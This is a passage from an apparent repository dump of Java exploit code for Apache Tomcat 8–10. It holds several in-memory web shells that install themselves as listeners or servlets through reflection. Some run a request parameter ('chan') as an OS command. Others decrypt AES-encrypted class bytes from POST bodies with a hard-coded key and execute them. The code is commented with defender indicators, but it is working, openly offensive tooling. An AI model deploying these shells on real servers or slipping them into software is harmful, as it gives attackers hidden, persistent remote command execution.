servletRequestEvent) { 43 | try{ 44 | RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest(); 45 | Field field = requestfacade.getClass().getDeclaredField("request"); 46 | field.setAccessible(true); 47 | Request request = (Request) field.get(requestfacade); 48 | Response response = request.getResponse(); 49 | HttpSession session = request.getSession(); 50 | 51 | Map pageContext = new HashMap(); 52 | pageContext.put("session", session); 53 | pageContext.put("request", request); 54 | pageContext.put("response", response); 55 | 56 | ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader(); 57 | 58 | if (request.getMethod().equals("POST")){ 59 | if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){ 60 | Class Lclass = cl.getClass().getSuperclass(); 61 | RushThere(Lclass,cl,session,request,pageContext); 62 | }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){ 63 | Class Lclass = cl.getClass().getSuperclass().getSuperclass(); 64 | RushThere(Lclass,cl,session,request,pageContext); 65 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){ 66 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass(); 67 | RushThere(Lclass,cl,session,request,pageContext); 68 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){ 69 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 70 | RushThere(Lclass,cl,session,request,pageContext); 71 | }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){ 72 | Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 73 | RushThere(Lclass,cl,session,request,pageContext); 74 | }else { 75 | 
Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass(); 76 | RushThere(Lclass,cl,session,request,pageContext); 77 | } 78 | } 79 | }catch(Exception ig){ 80 | //ig.printStackTrace(); 81 | } 82 | } 83 | 84 | public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map pageContext){ 85 | byte[] bytecode = java.util.Base64.getDecoder().decode("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"); 86 | try { 87 | java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); 88 | define.setAccessible(true); 89 | Class uclass = null; 90 | try { 91 | uclass = cl.loadClass("U"); 92 | } catch (ClassNotFoundException e) { 93 | uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length); 94 | } 95 | Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class); 96 | constructor.setAccessible(true); 97 | Object u = constructor.newInstance(this.getClass().getClassLoader()); 98 | Method Um = uclass.getDeclaredMethod("g", byte[].class); 99 | Um.setAccessible(true); 100 | String k = pa; 101 | session.setAttribute("u", k); 102 | Cipher c = Cipher.getInstance("AES"); 103 | c.init(2, new SecretKeySpec(k.getBytes(), "AES")); 104 | byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())); 105 | Class eclass = (Class) Um.invoke(u, eClassBytes); 106 | Object a = eclass.newInstance(); 107 | Method b = eclass.getDeclaredMethod("equals", Object.class); 108 | b.setAccessible(true); 109 | b.invoke(a, pageContext); 110 | return; 111 | }catch (Exception ig){ 112 | //ig.printStackTrace(); 113 | } 114 | } 115 | } 116 | 117 | 118 | -------------------------------------------------------------------------------- /lib/exploit/listener/tomcat10/LRain10.class: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat10/LRain10.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat10/LRain10.java:
--------------------------------------------------------------------------------
import jakarta.servlet.ServletRequestEvent;
import jakarta.servlet.ServletRequestListener;

import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.connector.Response;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/**
 * Tomcat 10 (jakarta namespace) request listener that executes the value of the request
 * parameter {@code chan} as an OS command. It installs itself into the running context the
 * moment the class is initialised (static block), so no descriptor, annotation or file on
 * disk is involved. The tomcat89 sibling {@code LRain} is identical apart from the
 * {@code javax} imports.
 *
 * Defender notes: enumerate the context's application event listeners at runtime and diff
 * them against web.xml / annotations; a listener class with no on-disk {@code .class}
 * resource is the indicator. Registration failures are silent (empty catch).
 */
public class LRain10 implements ServletRequestListener {

    /**
     * Runs on class initialisation (presumably when the class is loaded through the RMI/JNDI
     * injection this repository is built around — not visible here): obtains the current
     * {@link StandardContext} from the webapp class loader and registers a new instance as an
     * application event listener through reflection. Only in-memory state is changed.
     */
    static {
        try {
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            LRain10 servletRequestListener = new LRain10();
            // addApplicationEventListener is looked up by name so no compile-time link to it exists.
            Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
            addlistener.invoke(standardContext,servletRequestListener);

        } catch (Exception hi) {
            // Silent on failure: nothing is logged if registration does not succeed.
            //hi.printStackTrace();
        }
    }


    /** No-op; only requestInitialized carries behaviour. */
    @Override
    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {

    }

    /**
     * Invoked by Tomcat for every request. Unwraps the {@link RequestFacade} to the internal
     * {@link Request} through its private {@code request} field and, when a {@code chan}
     * parameter is present, runs its value as an OS command and writes the process's
     * standard output to the response, then closes the output stream. Requests without the
     * parameter are left untouched, so the listener is invisible to normal traffic.
     *
     * Defender notes: the parameter name {@code chan} is a fixed indicator in access logs;
     * at host level this appears as the Tomcat JVM spawning a child process from a
     * request-handling thread. Exceptions here are printed to stderr (catalina.out), unlike
     * the static block.
     *
     * @param servletRequestEvent event carrying the current request
     */
    @Override
    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
        try{
            RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
            Field field = requestfacade.getClass().getDeclaredField("request");
            field.setAccessible(true);
            Request lrequest = (Request) field.get(requestfacade);
            Response lresponse = lrequest.getResponse();

            if(lrequest.getParameter("chan") != null){
                // Parameter value is passed verbatim to Runtime.exec.
                Process process = Runtime.getRuntime().exec(lrequest.getParameter("chan"));
                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                        new java.io.InputStreamReader(process.getInputStream()));
                StringBuilder stringBuilder = new StringBuilder();
                String line;
                while ((line = bufferedReader.readLine()) != null) {
                    stringBuilder.append(line + '\n');
                }
                // Output is written with the platform default charset and the stream is closed,
                // so nothing further in the request pipeline can add to the response.
                lresponse.getOutputStream().write(stringBuilder.toString().getBytes());
                lresponse.getOutputStream().flush();
                lresponse.getOutputStream().close();
                return;
            }
        }catch(Exception ig){
            ig.printStackTrace();
        }
    }
}

--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/ILRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat89/ILRain.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/ILRain.java:
--------------------------------------------------------------------------------
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.connector.Response;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpSession;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

/**
 * Tomcat 8/9 (javax namespace) request listener that accepts AES-encrypted class bytes in
 * the body of any POST, loads them in memory and runs the resulting class. It installs
 * itself into the running context when the class is initialised (static block); nothing is
 * written to web.xml or disk. {@code ILRain10} is the jakarta-namespace twin.
 *
 * Defender notes: the hard-coded 16-byte key below, the session attribute {@code "u"} and a
 * class named {@code U} with no backing {@code .class} resource are all static indicators.
 * Every request — including plain GETs — creates an HTTP session here (see
 * requestInitialized), which is itself a behavioural tell. All failures are swallowed.
 */
public class ILRain implements ServletRequestListener {
    // Fixed AES key shared with the client side; identical across the I* variants on this page.
    private final String pa = "3ad2fddfe8bad8e6";

    /**
     * Runs on class initialisation: obtains the current {@link StandardContext} from the
     * webapp class loader and registers a new instance as an application event listener via
     * reflection. Registration failures are silent.
     */
    static {
        try {
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            ILRain servletRequestListener = new ILRain();
            Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
            addlistener.invoke(standardContext,servletRequestListener);

        } catch (Exception hi) {
            //hi.printStackTrace();
        }
    }


    /** No-op. */
    @Override
    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {

    }

    /**
     * Invoked for every request. Unwraps the facade to the internal {@link Request}, creates
     * (or fetches) the HTTP session, builds the context map for the loaded class and, on
     * POST only, walks the context class loader's superclass chain (up to six levels) until
     * it reaches {@code java.lang.ClassLoader}; that class is passed to {@link #RushThere}
     * so its private {@code defineClass} can be used. Non-POST requests pass through.
     *
     * @param servletRequestEvent event carrying the current request
     */
    @Override
    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
        try{
            RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
            Field field = requestfacade.getClass().getDeclaredField("request");
            field.setAccessible(true);
            Request request = (Request) field.get(requestfacade);
            Response response = request.getResponse();
            // getSession() with no argument creates a session when none exists — on every request.
            HttpSession session = request.getSession();

            Map pageContext = new HashMap();
            pageContext.put("session", session);
            pageContext.put("request", request);
            pageContext.put("response", response);

            ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();

            if (request.getMethod().equals("POST")){
                // Each branch differs only in how many superclass hops reach java.lang.ClassLoader.
                if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                    Class Lclass = cl.getClass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                    Class Lclass = cl.getClass().getSuperclass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                    Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                    Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                    Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }else {
                    // Sixth hop is taken unconditionally; deeper hierarchies are not checked.
                    Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                    RushThere(Lclass,cl,session,request,pageContext);
                }
            }
        }catch(Exception ig){
            // Swallowed: a failing request leaves no trace in the server log.
            //ig.printStackTrace();
        }
    }

    /**
     * Second stage: loads (or reflectively defines) a helper class named {@code U} on the
     * webapp class loader and uses it to turn the AES-decrypted request body into a class
     * whose {@code equals(Object)} is invoked with the context map. Only memory is touched.
     *
     * @param Lclass      class on which the private {@code defineClass(byte[],int,int)} is looked up
     * @param cl          thread-context class loader the helper class is defined in
     * @param session     HTTP session; the key is written to its attribute {@code "u"}
     * @param request     current request; only the first line of its body is read
     * @param pageContext map handed to the loaded class (keys "session", "request", "response")
     */
    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request, Map pageContext){
        // Embedded bytecode of the helper class (elided on this page).
        byte[] bytecode = java.util.Base64.getDecoder().decode("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");
        try {
            // Private ClassLoader.defineClass reached reflectively: no JAR or classpath entry is involved.
            java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            define.setAccessible(true);
            Class uclass = null;
            try {
                // Reuse the helper if an earlier request already defined it in this loader.
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException e) {
                uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
            }
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = pa;
            // The key is stored in the session on every POST — visible in session dumps.
            session.setAttribute("u", k);
            // Mode 2 == Cipher.DECRYPT_MODE; bare "AES" leaves mode/padding to the provider default.
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            // Body: one Base64 line (internal sun.misc decoder), AES-encrypted class bytes.
            byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class) Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            // The loaded class's entry point is its equals(Object); it receives the context map.
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
            return;
        }catch (Exception ig){
            // Swallowed: wrong key, bad body or any reflection failure is invisible in logs.
            //ig.printStackTrace();
        }
    }
}

--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/LRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/listener/tomcat89/LRain.class
--------------------------------------------------------------------------------
/lib/exploit/listener/tomcat89/LRain.java:
--------------------------------------------------------------------------------
import org.apache.catalina.connector.Request;
import org.apache.catalina.connector.RequestFacade;
import org.apache.catalina.connector.Response;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import javax.servlet.ServletRequestEvent;
import javax.servlet.ServletRequestListener;
import java.lang.reflect.Field;
import java.lang.reflect.Method;

/**
 * Tomcat 8/9 (javax namespace) request listener that executes the value of the request
 * parameter {@code chan} as an OS command; self-installs on class initialisation. Identical
 * to {@code LRain10} apart from the imports.
 *
 * Defender notes: diff the context's runtime application event listeners against web.xml /
 * annotations; the parameter name {@code chan} is a fixed indicator in access logs.
 */
public class LRain implements ServletRequestListener {

    /**
     * Runs on class initialisation: registers a new instance on the current
     * {@link StandardContext} via reflection. Failure is silent.
     */
    static {
        try {
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            LRain servletRequestListener = new LRain();
            Method addlistener = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("addApplicationEventListener", Object.class);
            addlistener.invoke(standardContext,servletRequestListener);

        } catch (Exception hi) {
            //hi.printStackTrace();
        }
    }


    /** No-op. */
    @Override
    public void requestDestroyed(ServletRequestEvent servletRequestEvent) {

    }

    /**
     * Invoked for every request. Unwraps the facade to the internal {@link Request} and,
     * when a {@code chan} parameter is present, runs its value as an OS command, writes the
     * process's standard output to the response and closes the stream. Other requests pass
     * through untouched. Exceptions are printed to stderr (catalina.out).
     *
     * @param servletRequestEvent event carrying the current request
     */
    @Override
    public void requestInitialized(ServletRequestEvent servletRequestEvent) {
        try{
            RequestFacade requestfacade= (RequestFacade) servletRequestEvent.getServletRequest();
            Field field = requestfacade.getClass().getDeclaredField("request");
            field.setAccessible(true);
            Request lrequest = (Request) field.get(requestfacade);
            Response lresponse = lrequest.getResponse();

            if(lrequest.getParameter("chan") != null){
                // Parameter value is passed verbatim to Runtime.exec.
                Process process = Runtime.getRuntime().exec(lrequest.getParameter("chan"));
                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                        new java.io.InputStreamReader(process.getInputStream()));
                StringBuilder stringBuilder = new StringBuilder();
                String line;
                while ((line = bufferedReader.readLine()) != null) {
                    stringBuilder.append(line + '\n');
                }
                lresponse.getOutputStream().write(stringBuilder.toString().getBytes());
                lresponse.getOutputStream().flush();
                lresponse.getOutputStream().close();
                return;
            }
        }catch(Exception ig){
            ig.printStackTrace();
        }
    }
}
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/ISRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat10/ISRain10.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/ISRain10.java:
--------------------------------------------------------------------------------
import jakarta.servlet.*;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import jakarta.servlet.http.HttpSession;
import org.apache.catalina.Container;
import org.apache.catalina.Wrapper;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import java.io.IOException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

/**
 * Tomcat 10 (jakarta namespace) servlet, self-registered at URL path {@code /p} on class
 * initialisation, that accepts AES-encrypted class bytes in the body of a POST, loads them
 * in memory and runs the resulting class. The tomcat89 sibling {@code ISRain} is the same
 * code with {@code javax} imports.
 *
 * Defender notes: a wrapper named {@code p} / mapping {@code /p} that appears in the running
 * {@link StandardContext} but in no descriptor or annotation is the indicator; the key
 * string below, the session attribute {@code "u"} and a class named {@code U} without a
 * backing {@code .class} resource are static ones. Unlike the listener variants, errors in
 * RushThere are printed to stderr (catalina.out).
 */
public class ISRain10 implements Servlet {
    // Fixed AES key shared with the client side; identical across the I* variants on this page.
    private final String pa = "3ad2fddfe8bad8e6";

    /**
     * Runs on class initialisation: builds a Tomcat {@link Wrapper} for this servlet through
     * reflection, names it {@code p}, marks it load-on-startup, adds it as a child of the
     * current {@link StandardContext} and maps it to {@code /p}. Only in-memory state is
     * changed; failure is silent.
     */
    static{
        try{
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            ISRain10 greetServlet = new ISRain10();

            // Every container call below goes through reflection; nothing links to Tomcat at compile time.
            Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
            Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);

            Method gname = Container.class.getDeclaredMethod("setName", String.class);
            gname.invoke(greetWrapper,"p");

            Method gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
            gload.invoke(greetWrapper,1);

            Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
            gservlet.invoke(greetWrapper,greetServlet);

            Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
            gclass.invoke(greetWrapper,greetServlet.getClass().getName());

            Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
            gchild.invoke(standardContext,greetWrapper);

            // Mapping "/p" -> wrapper "p"; the third argument (jspWildCard) is false.
            Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
            gmap.invoke(standardContext,"/p", "p",false);
        }catch (Exception hi){
            //hi.printStackTrace();
        }
    }

    /** No-op. */
    @Override
    public void init(ServletConfig config) throws ServletException {}

    /** Always null. */
    @Override
    public String getServletInfo() {return null;}

    /** No-op; getServletConfig (same line, no @Override) always returns null. */
    @Override
    public void destroy() {} public ServletConfig getServletConfig() {return null;}

    /**
     * Entry point for {@code /p}. Builds the session/request/response map for the loaded
     * class and, on POST only, walks the context class loader's superclass chain (up to six
     * levels) until it reaches {@code java.lang.ClassLoader}; that class is handed to
     * {@link #RushThere}. Non-POST requests fall through and produce no output here.
     *
     * @param servletRequest  current request (cast to HttpServletRequest)
     * @param servletResponse current response (cast to HttpServletResponse)
     */
    @Override
    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
        HttpServletRequest request = (HttpServletRequest) servletRequest;
        HttpServletResponse response = (HttpServletResponse) servletResponse;
        // Creates a session when none exists.
        HttpSession session = request.getSession();

        Map pageContext = new HashMap();
        pageContext.put("session", session);
        pageContext.put("request", request);
        pageContext.put("response", response);

        ClassLoader cl = (ClassLoader)Thread.currentThread().getContextClassLoader();

        if (request.getMethod().equals("POST")){
            // Each branch differs only in how many superclass hops reach java.lang.ClassLoader.
            if(cl.getClass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else if(cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getName().equals("java.lang.ClassLoader")){
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }else {
                // Sixth hop is taken unconditionally; deeper hierarchies are not checked.
                Class Lclass = cl.getClass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass().getSuperclass();
                RushThere(Lclass,cl,session,request,pageContext);
            }
        }
    }

    /**
     * Second stage: loads (or reflectively defines) a helper class named {@code U} on the
     * webapp class loader and uses it to turn the AES-decrypted request body into a class
     * whose {@code equals(Object)} is invoked with the context map. Only memory is touched.
     *
     * @param Lclass      class on which the private {@code defineClass(byte[],int,int)} is looked up
     * @param cl          thread-context class loader the helper class is defined in
     * @param session     HTTP session; the key is written to its attribute {@code "u"}
     * @param request     current request; only the first line of its body is read
     * @param pageContext map handed to the loaded class (keys "session", "request", "response")
     */
    public void RushThere(Class Lclass, ClassLoader cl, HttpSession session, HttpServletRequest request,Map pageContext){
        // Embedded bytecode of the helper class (elided on this page).
        byte[] bytecode = java.util.Base64.getDecoder().decode("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");
        try {
            // Private ClassLoader.defineClass reached reflectively: no JAR or classpath entry is involved.
            java.lang.reflect.Method define = Lclass.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
            define.setAccessible(true);
            Class uclass = null;
            try {
                // Reuse the helper if an earlier request already defined it in this loader.
                uclass = cl.loadClass("U");
            } catch (ClassNotFoundException e) {
                uclass = (Class) define.invoke(cl, bytecode, 0, bytecode.length);
            }
            Constructor constructor = uclass.getDeclaredConstructor(ClassLoader.class);
            constructor.setAccessible(true);
            Object u = constructor.newInstance(this.getClass().getClassLoader());
            Method Um = uclass.getDeclaredMethod("g", byte[].class);
            Um.setAccessible(true);
            String k = pa;
            // The key is stored in the session on every POST — visible in session dumps.
            session.setAttribute("u", k);
            // Mode 2 == Cipher.DECRYPT_MODE; bare "AES" leaves mode/padding to the provider default.
            Cipher c = Cipher.getInstance("AES");
            c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
            // Body: one Base64 line (internal sun.misc decoder), AES-encrypted class bytes.
            byte[] eClassBytes = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()));
            Class eclass = (Class) Um.invoke(u, eClassBytes);
            Object a = eclass.newInstance();
            // The loaded class's entry point is its equals(Object); it receives the context map.
            Method b = eclass.getDeclaredMethod("equals", Object.class);
            b.setAccessible(true);
            b.invoke(a, pageContext);
            return;
        }catch (Exception ig){
            // Printed to stderr: a wrong key or malformed body leaves a stack trace in catalina.out.
            ig.printStackTrace();
        }
    }
}


--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/SRain10.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat10/SRain10.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat10/SRain10.java:
--------------------------------------------------------------------------------
import jakarta.servlet.*;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import org.apache.catalina.Container;
import org.apache.catalina.Wrapper;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import java.io.IOException;
import java.lang.reflect.Method;

/**
 * Tomcat 10 (jakarta namespace) servlet, self-registered at {@code /p} on class
 * initialisation, that executes the request parameter {@code chan} as an OS command and
 * answers 404 to everything else. {@code SRain} is the tomcat89 twin.
 *
 * Defender notes: because non-matching requests get a 404, probing {@code /p} looks like a
 * missing resource — hunt for the {@code chan} parameter in access logs and for a wrapper
 * named {@code p} in the running context that no descriptor declares.
 */
public class SRain10 implements Servlet {

    /**
     * Runs on class initialisation: builds a {@link Wrapper} for this servlet through
     * reflection, names it {@code p}, adds it to the current {@link StandardContext} and maps
     * it to {@code /p}. Failure is silent.
     */
    static{
        try{
            WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
            StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

            SRain10 greetServlet = new SRain10();

            Method createWrapper = Class.forName("org.apache.catalina.core.StandardContext").getDeclaredMethod("createWrapper");
            Wrapper greetWrapper = (Wrapper) createWrapper.invoke(standardContext);

            Method gname = Container.class.getDeclaredMethod("setName", String.class);
            gname.invoke(greetWrapper,"p");

            Method
gload = Wrapper.class.getDeclaredMethod("setLoadOnStartup", int.class);
            gload.invoke(greetWrapper,1);

            Method gservlet = Wrapper.class.getDeclaredMethod("setServlet", Servlet.class);
            gservlet.invoke(greetWrapper,greetServlet);

            Method gclass = Wrapper.class.getDeclaredMethod("setServletClass", String.class);
            gclass.invoke(greetWrapper,greetServlet.getClass().getName());

            Method gchild = StandardContext.class.getDeclaredMethod("addChild",Container.class);
            gchild.invoke(standardContext,greetWrapper);

            // Mapping "/p" -> wrapper "p"; the third argument (jspWildCard) is false.
            Method gmap = StandardContext.class.getDeclaredMethod("addServletMappingDecoded",String.class,String.class,boolean.class);
            gmap.invoke(standardContext,"/p", "p",false);
        }catch (Exception hi){
            // Silent on failure: nothing is logged if registration does not succeed.
            //hi.printStackTrace();
        }
    }

    /** No-op. */
    @Override
    public void init(ServletConfig config) throws ServletException {}

    /** Always null. */
    @Override
    public String getServletInfo() {return null;}

    /** No-op; getServletConfig (same line, no @Override) always returns null. */
    @Override
    public void destroy() {} public ServletConfig getServletConfig() {return null;}

    /**
     * Entry point for {@code /p}. When a {@code chan} parameter is present its value is run
     * as an OS command and the process's standard output is written to the response, which
     * is then closed; otherwise the response is a 404. Exceptions propagate to the container.
     *
     * Defender notes: the parameter name {@code chan} is a fixed indicator; at host level this
     * is the Tomcat JVM spawning a child process from a request-handling thread.
     *
     * @param servletRequest  current request (cast to HttpServletRequest)
     * @param servletResponse current response (cast to HttpServletResponse)
     */
    @Override
    public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {
        HttpServletRequest req = (HttpServletRequest) servletRequest;
        HttpServletResponse resp = (HttpServletResponse) servletResponse;
        if (req.getParameter("chan") != null){
            // Parameter value is passed verbatim to Runtime.exec.
            Process process = Runtime.getRuntime().exec(req.getParameter("chan"));
            java.io.BufferedReader bufferedReader = new java.io.BufferedReader(
                    new java.io.InputStreamReader(process.getInputStream()));
            StringBuilder stringBuilder = new StringBuilder();
            String line;
            while ((line = bufferedReader.readLine()) != null) {
                stringBuilder.append(line + '\n');
            }
            resp.getOutputStream().write(stringBuilder.toString().getBytes());
            resp.getOutputStream().flush();
            resp.getOutputStream().close();
            return;
        }
        else{
            // Plain requests to /p look like a missing resource.
            resp.sendError(HttpServletResponse.SC_NOT_FOUND);
        }
    }
}

--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/ISRain.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/novysodope/RMI_Inj_MemShell/30707f0fea43549ef0f1678eccdeceda65df1c3f/lib/exploit/servlet/tomcat89/ISRain.class
--------------------------------------------------------------------------------
/lib/exploit/servlet/tomcat89/ISRain.java:
--------------------------------------------------------------------------------
import org.apache.catalina.Container;
import org.apache.catalina.Wrapper;
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import javax.crypto.Cipher;
import javax.crypto.spec.SecretKeySpec;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
